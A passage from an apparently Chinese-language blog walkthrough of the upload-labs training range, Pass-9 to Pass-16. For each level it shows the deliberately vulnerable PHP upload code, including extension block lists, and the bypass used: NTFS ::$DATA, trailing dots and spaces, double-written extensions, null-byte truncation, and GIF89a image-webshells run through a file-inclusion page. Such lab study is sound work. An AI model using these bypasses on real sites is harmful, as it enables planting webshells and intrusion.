class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>查看源码发现没有限制<code>::$DATA</code>,那就直接用<code>::$DATA</code>绕过试试</p>
<p>DATA是NTFS文件系统的存储数据流的默认属性(所以也是适用与 Windows 中)<br>当访问1.php::$DATA时,就是请求1.php本身的数据</p>
<p>上传 php 文件,使用 burpsuite 抓包改后缀添加<code>::$DATA</code><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582686434-63469-upload-labs9-2.png" alt="img"><br>Linux 环境无法执行该文件,需要在 Windows 环境上传</p>
<h2 id="Pass-10-点-空格-点绕过"><a href="#Pass-10-点-空格-点绕过" class="headerlink" title="Pass-10-点+空格+点绕过"></a>Pass-10-点+空格+点绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>,<span class="string">".ini"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>黑名单校验不严,导致php.php. .绕过</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br></pre></td></tr></table></figure>
<p><code>php.php.空格.</code> -> 删除文件名末尾的点,变为<code>php.php.空格</code>-> 首尾去空,变为<code>php.php.</code>-><code>php.</code>后缀不在黑名单内,绕过黑名单验证->Windows发现文件名最后有<code>.</code>,自动去除 -> 最终磁盘上的文件名为<code>php.php</code></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582686864-45831-upload-labs10-2.png" alt="img"><br>上传后的文件同样只能在 Windows 环境中执行,Linux 环境不能执行该文件</p>
<h2 id="Pass-11-双写绕过"><a href="#Pass-11-双写绕过" class="headerlink" title="Pass-11-双写绕过"></a>Pass-11-双写绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">"php"</span>,<span class="string">"php5"</span>,<span class="string">"php4"</span>,<span class="string">"php3"</span>,<span class="string">"php2"</span>,<span class="string">"html"</span>,<span class="string">"htm"</span>,<span class="string">"phtml"</span>,<span class="string">"pht"</span>,<span class="string">"jsp"</span>,<span class="string">"jspa"</span>,<span class="string">"jspx"</span>,<span class="string">"jsw"</span>,<span class="string">"jsv"</span>,<span class="string">"jspf"</span>,<span class="string">"jtml"</span>,<span class="string">"asp"</span>,<span class="string">"aspx"</span>,<span class="string">"asa"</span>,<span class="string">"asax"</span>,<span class="string">"ascx"</span>,<span class="string">"ashx"</span>,<span class="string">"asmx"</span>,<span class="string">"cer"</span>,<span class="string">"swf"</span>,<span class="string">"htaccess"</span>,<span class="string">"ini"</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="variable">$deny_ext</span>,<span class="string">""</span>, <span class="variable">$file_name</span>);</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>; </span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>黑名单过滤,只过滤一次</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="variable">$deny_ext</span>,<span class="string">""</span>, <span class="variable">$file_name</span>);</span><br></pre></td></tr></table></figure>
<p>因为str_ireplace函数只使用了一次。直接使用双写绕过就行 test.pphphp ,最后生成 test.php 文件</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582687359-459777-upload-labs11-2.png" alt="img"><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582687373-982033-upload-labs11-3.png" alt="img"></p>
<h2 id="Pass-12-00截断"><a href="#Pass-12-00截断" class="headerlink" title="Pass-12-00截断"></a>Pass-12-00截断</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="title function_ invoke__">strrpos</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = <span class="variable">$_GET</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>提示说本Pass文件路径可控,看到是白名单判断,但是$img_path直接拼接,因此可以利用%00截断绕过</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$img_path</span> = <span class="variable">$_GET</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br></pre></td></tr></table></figure>
<p>但是%00截断的条件是要满足以下几点:</p>
<ul>
<li>php 版本小于 5.3.4</li>
<li>php的magic_quotes_gpc为OFF状态</li>
</ul>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726022129029.png" alt="image-20200726022129029"></p>
<p>因为这里我们使用的 php 7.x 所以无法满足使用 %00 截断<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582693345-95671-upload-labs12-2.png" alt="img"></p>
<h2 id="Pass-13-00截断"><a href="#Pass-13-00截断" class="headerlink" title="Pass-13-00截断"></a>Pass-13-00截断</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="title function_ invoke__">strrpos</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = <span class="variable">$_POST</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传失败"</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>Pass-12 中对 url 进行解码。将 %00 解码成 0x00 ,而 Pass-13 中没有 url 解码这一步,所以直接在 hex 的值中修改,形成 0x00 截断。</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726101622367.png" alt="image-20200726101622367"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726101816827.png" alt="image-20200726101816827"></p>
<h2 id="Pass-14-图片马绕过"><a href="#Pass-14-图片马绕过" class="headerlink" title="Pass-14-图片马绕过"></a>Pass-14-图片马绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getReailFileType</span>(<span class="params"><span class="variable">$filename</span></span>)</span>{</span><br><span class="line"> <span class="variable">$file</span> = <span class="title function_ invoke__">fopen</span>(<span class="variable">$filename</span>, <span class="string">"rb"</span>);</span><br><span class="line"> <span class="variable">$bin</span> = <span class="title function_ invoke__">fread</span>(<span class="variable">$file</span>, <span class="number">2</span>); <span class="comment">//只读2字节</span></span><br><span class="line"> <span class="title function_ invoke__">fclose</span>(<span class="variable">$file</span>);</span><br><span class="line"> <span class="variable">$strInfo</span> = @<span class="title function_ invoke__">unpack</span>(<span class="string">"C2chars"</span>, <span class="variable">$bin</span>); </span><br><span class="line"> <span class="variable">$typeCode</span> = <span class="title function_ invoke__">intval</span>(<span class="variable">$strInfo</span>[<span class="string">'chars1'</span>].<span class="variable">$strInfo</span>[<span class="string">'chars2'</span>]); </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">''</span>; </span><br><span class="line"> <span class="keyword">switch</span>(<span class="variable">$typeCode</span>){ </span><br><span class="line"> <span class="keyword">case</span> <span class="number">255216</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'jpg'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">13780</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'png'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="number">7173</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'gif'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'unknown'</span>;</span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$fileType</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$file_type</span> = <span class="title function_ invoke__">getReailFileType</span>(<span class="variable">$temp_file</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$file_type</span> == <span class="string">'unknown'</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_type</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>可以看到 Pass14 还需要结合文件包含漏洞,那么也就冥冥中提示需要利用图片马,然后文件包含执行,所以我们直接利用图片马上传。<br>既然允许 GIF 格式那么我们即使用 GIF 标识前缀<code>GIF89a</code></p>
<p>先来写一个 phpinfo 文件 pass14.php:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">GIF89a</span><br><span class="line"><?php</span><br><span class="line">phpinfo();</span><br><span class="line">?></span><br></pre></td></tr></table></figure>
<p>然后将<code>pass14.php</code>重命名为<code>pass14.gif</code></p>
<p>直接上传 GIF 图片马:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582773548-215050-upload-labs14-2.png" alt="img"></p>
<p>文件上传成功:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582773596-912022-upload-labs14-3.png" alt="img"></p>
<p>Pass14中提供了一个<code>include.php</code>文件,文件上传之后利用<code>include.php</code>再文件包含<code>pass14.gif</code></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">include.php?file=upload/**.gif</span><br></pre></td></tr></table></figure>
<p>文件包含:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726102909903.png" alt="image-20200726102909903"></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> <span class="title function_ invoke__">show_source</span>(__file__);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<h2 id="Pass-15-getimagesize-图片马"><a href="#Pass-15-getimagesize-图片马" class="headerlink" title="Pass-15-getimagesize()-图片马"></a>Pass-15-getimagesize()-图片马</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span>(<span class="params"><span class="variable">$filename</span></span>)</span>{</span><br><span class="line"> <span class="variable">$types</span> = <span class="string">'.jpeg|.png|.gif'</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">file_exists</span>(<span class="variable">$filename</span>)){</span><br><span class="line"> <span class="variable">$info</span> = <span class="title function_ invoke__">getimagesize</span>(<span class="variable">$filename</span>);</span><br><span class="line"> <span class="variable">$ext</span> = <span class="title function_ invoke__">image_type_to_extension</span>(<span class="variable">$info</span>[<span class="number">2</span>]);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">stripos</span>(<span class="variable">$types</span>,<span class="variable">$ext</span>)>=<span class="number">0</span>){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$ext</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$res</span> = <span class="title function_ invoke__">isImage</span>(<span class="variable">$temp_file</span>);</span><br><span class="line"> <span class="keyword">if</span>(!<span class="variable">$res</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">"/"</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="variable">$res</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><code>getimagesize</code>函数用来检查文件类型:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="title function_ invoke__">Array</span></span><br><span class="line">(</span><br><span class="line"> [<span class="number">0</span>] => <span class="number">350</span></span><br><span class="line"> [<span class="number">1</span>] => <span class="number">318</span></span><br><span class="line"> [<span class="number">2</span>] => <span class="number">2</span><span class="comment">//其中1 = GIF,2 = JPG,3 = PNG,4 = SWF,5 = PSD,6 = BMP,7 = TIFF(intel byte order),8 = TIFF(motorola byte order),9 = JPC,10 = JP2,11 = JPX,12 = JB2,13 = SWC,14 = IFF,15 = WBMP,16 = XBM</span></span><br><span class="line"> [<span class="number">3</span>] => width=<span class="string">"350"</span> height=<span class="string">"318"</span></span><br><span class="line"> [bits] => <span class="number">8</span></span><br><span class="line"> [channels] => <span class="number">3</span></span><br><span class="line"> [mime] => image/jpeg</span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<p>如果绕过<code>getimagesize</code>函数可以参考:<a href="https://0x1.im/blog/php/php-function-getimagesize.html">https://0x1.im/blog/php/php-function-getimagesize.html</a><br>绕过方式与 Pass14 类似<br>修改文件头标识:<code>GIF89a</code>(直接在文件头加入,也可以修改hex:<code>47 49 46 38 39 61</code>)</p>
<h2 id="Pass-16-exif-imagetype-图片马"><a href="#Pass-16-exif-imagetype-图片马" class="headerlink" title="Pass-16-exif_imagetype()-图片马"></a>Pass-16-exif_imagetype()-图片马</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span>(<span class="params"><span class="variable">$filename</span></span>)</span>{</span><br><span class="line"> <span class="comment">//需要开启php_exif模块</span></span><br><span class="line"> <span class="variable">$image_type</span> = <span class="title function_ invoke__">exif_imagetype</span>(<span class="variable">$filename</span>);</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$image_type</span>) {</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_GIF:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"gif"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_JPEG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"jpg"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_PNG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"png"</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span 